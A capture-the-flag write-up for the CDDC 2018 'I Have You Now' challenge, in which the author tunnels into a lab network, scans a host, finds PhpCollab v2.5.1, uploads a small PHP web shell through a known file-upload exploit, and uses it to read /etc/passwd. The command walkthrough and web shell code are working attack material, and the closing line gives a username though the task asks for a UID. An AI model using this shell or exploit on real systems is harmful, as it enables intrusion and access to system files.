CDDC 2018: I Have You Now

Category: Kamikaze Points: 239 Description:

  1. From your position on target 10.50.199.11, exploit the target 10.50.199.12 and gain access to the file ' /etc/passwd ' .
  2. Inside the file, identify the UID of the user whose username starts with the case-sensitive letter ' C ' .
  3. Enter the correct UID value into the response field below.
  4. Submit the Kamikaze Challenge by clicking on the Submit button.

Write-Up

After that nmap fun, we continue. This challenge took me a fair bit but instead of wasting time on finding the exploit, I was tinkering with my proxy setup. I ended up using a version of a multi-hop SSH relay to do the hacking locally. The setup of the proxy is something like this,

root@ctf:~# ssh -L 1080:127.0.0.1:1081 10.50.0.199 -4
root@10.50.0.199's password: 
Last login: Sat Jun  2 17:36:11 2018 from 192.168.200.6
[root@fw2018 ~]# ssh -D 1081 hero@10.50.199.11 -4
hero@10.50.199.11's password: 
Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-111-generic x86_64)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sat Jun  2 09:26:06 UTC 2018

  System load:  0.0               Processes:           82
  Usage of /:   21.6% of 9.81GB   Users logged in:     0
  Memory usage: 3%                IP address for eth0: 10.50.199.11
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

  Get cloud support with Ubuntu Advantage Cloud Guest:
    http://www.ubuntu.com/business/services/cloud

17 packages can be updated.
15 updates are security updates.

Your Hardware Enablement Stack (HWE) is supported until April 2019.

Last login: Sat Jun  2 09:26:06 2018 from 10.50.199.2
hero@cddc-t041-ot-svr1:~$

Now to access the internal network like I was 10.50.199.11, I would just proxy everything through 127.0.0.1:1080, in a SOCKS5 manner.

So, first up, would be to nmap our target,

root@ctf:~# proxychains4 nmap -sT -sV 10.50.199.12
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4

Starting Nmap 7.60 ( https://nmap.org ) at 2018-06-02 10:56 UTC
Nmap scan report for 10.50.199.12
Host is up (0.045s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 5.3 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.15 ((CentOS))
3306/tcp open  mysql   MySQL (unauthorized)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 57.01 seconds

Okay, so we have a couple of services and an interesting MySQL server. What do we do now? Well, let's try exploring our options! First, let's try the most obvious apple in the bucket,

root@ctf:~# proxychains4 nc 10.50.199.12 3306
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
h?jHost 'cddc-t041-ot-svr1.c.bitnami-qivcfh0ekq.internal' is not allowed to connect to this MySQL server

That doesn't seem to work, let's try the Apache server. At our first glance, the server seems to be entirely unconfigured.

root@ctf:~# proxychains4 curl http://10.50.199.12
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[...]
    <h1>Apache 2 Test Page<br><font size="-1"><strong>powered by</font> CentOS</strong></h1>
[...]

Let's whip out the dirbuster applications and see what we can find,

msf >  use auxiliary/scanner/http/dir_scanner
msf auxiliary(scanner/http/dir_scanner) > set rhosts 10.50.199.12
rhosts => 10.50.199.12
msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 10.50.199.12
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed
msf auxiliary(scanner/http/dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 10.50.199.12
[+] Found http://10.50.199.12:80/cgi-bin/ 403 (10.50.199.12)
[+] Found http://10.50.199.12:80/error/ 403 (10.50.199.12)
[+] Found http://10.50.199.12:80/icons/ 200 (10.50.199.12)
[+] Found http://10.50.199.12:80/project/ 302 (10.50.199.12)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

So, some interesting directories. Let's take a gander at the 302 redirection and in here, we find an interesting application.

root@ctf:~# proxychains4 curl http://10.50.199.12/project/ -L
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<!-- Powered by PhpCollab v2.5.1 //-->
<html>
<head>
<meta http-equiv='Content-Type' content="text/html; charset=ISO-8859-1" />
<title>PhpCollab</title>
<meta name='robots' content='none' />
<meta name='description' content='Groupware module. Manage web projects with team collaboration, users management, tasks and projects tracking, files approval tracking, project sites clients access, customer relationship management (Php / Mysql, PostgreSQL or Sql Server).' />
<meta name='keywords' content='PhpCollab, phpcollab.com, Sourceforge, management, web, projects, tasks, organizations, reports, Php, MySql, Sql Server, mssql, Microsoft Sql Server, PostgreSQL, module, application, module, file management, project site, team collaboration, free, crm, CRM, cutomer relationship management, workflow, workgroup' />
<meta name='copyright' content='PHPCollab' />
<script type='text/Javascript'>
<!--
var gBrowserOK = true;
var gOSOK = true;
var gCookiesOK = true;
var gFlashOK = true;
// -->
</script>
<script type='text/javascript' src='../javascript/general.js'></script>
<script type='text/JavaScript' src='../javascript/overlib_mini.js'></script>
<link rel='stylesheet' href='../themes/default/stylesheet.css' type='text/css' />

</head>
<body onLoad='document.loginForm.loginForm.focus();'><div id='overDiv' style='position:absolute; visibility:hidden; z-index:1000;'></div>

<p id="header"><img src="../logos_clients/1.php" border="0" alt=""></p>

<p id='account'>&nbsp;</p>

<p id='navigation'><a href='../general/login.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>Log In</a>&nbsp;&nbsp;<a href='../general/systemrequirements.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>System Requirements</a>&nbsp;&nbsp;<a href='../general/license.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>License</a></p>

<p class='breadcrumbs'>&nbsp;</p>

<a name='loginAnchor'></a>

<form accept-charset='UNKNOWN' method='POST' action='../general/login.php?auth=test&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4' name='loginForm' enctype='application/x-www-form-urlencoded'>

<h1 class="heading">PhpCollab : Log In</h1>

<table class='content' cellspacing='0' cellpadding='0'><tr><th colspan='2'>Please log in</th></tr><tr class='odd'><td valign='top' class='leftvalue'>Language :</td><td><select name="defaultLanguage"><option value="ar">Arabic</option><option value="az">Azerbaijani</option><option value="pt-br">Brazilian Portuguese</option><option value="bg">Bulgarian</option><option value="ca">Catalan</option><option value="zh">Chinese simplified</option><option value="zh-tw">Chinese traditional</option><option value="cs-iso">Czech (iso)</option><option value="cs-win1250">Czech (win1250)</option><option value="da">Danish</option><option value="nl">Dutch</option><option value="en" selected>English</option><option value="et">Estonian</option><option value="fr">French</option><option value="de">German</option><option value="hu">Hungarian</option><option value="is">Icelandic</option><option value="in">Indonesian</option><option value="it">Italian</option><option value="ja">Japanese</option><option value="ko">Korean</option><option value="lv">Latvian</option><option value="no">Norwegian</option><option value="pl">Polish</option><option value="pt">Portuguese</option><option value="ro">Romanian</option><option value="ru">Russian</option><option value="sk-win1250">Slovak (win1250)</option><option value="es">Spanish</option><option value="tr">Turkish</option><option value="uk">Ukrainian</option></select>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>* User Name :</td><td><input value='' type='text' name='loginForm'>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>* Password :</td><td><input value='' type='password' name='passwordForm'>&nbsp;</td></tr>
<tr class='odd'><td valign='top' class='leftvalue'>&nbsp;</td><td><input type='submit' name='save' value='Log In'><br/><br/><br/><a href='../general/sendpassword.php?&PHPSESSID=30ai85k3c3i8jn3mnesmvjedf4'>Forgot password ?</a>&nbsp;</td></tr>
</table>
<hr />
</form>
<p id="footer">PhpCollab v2.5.1 </p>


        </body>
        </html>

What's PhpCollab anyways? Well, it's some weird application, the purpose of it isn't important, but rather, now we have a name and a version. A fast Google gives us an exploit for arbitary file upload.

Since with that exploit, we can upload anything we want, let's dummy up a simple PHP shell page.

<?php
if(isset($_REQUEST['cmd'])){
    $cmd = ($_REQUEST['cmd']);
    system($cmd);
    die;
}
?>

Proceed to upload it,

root@ctf:~# proxychains4 ./exploit.py http://10.50.199.12/project 1 shell.php 
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[*] Trying to exploit with URL : http://10.50.199.12/project/clients/editclient.php?id=1&action=update...
[OK] Backdoor link : http://10.50.199.12/project/logos_clients/1.php

Now that our payload PHP shell has been uploaded at http://10.50.199.12/project/logos_clients/1.php, we can get our hacking done!

root@ctf:~# proxychains4 curl 'http://10.50.199.12/project/logos_clients/1.php' --data 'cmd=cat /etc/passwd'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.12
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.50.199.12:80  ...  OK
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
abrt:x:173:173::/etc/abrt:/sbin/nologin
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
saslauth:x:499:76:Saslauthd user:/var/empty/saslauth:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
tcpdump:x:72:72::/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
Chris:x:500:501::/home/Chris:/bin/bash
osboxes:x:501:502::/home/osboxes:/bin/bash

Therefore, the flag is Chris.

results matching ""

    No results matching ""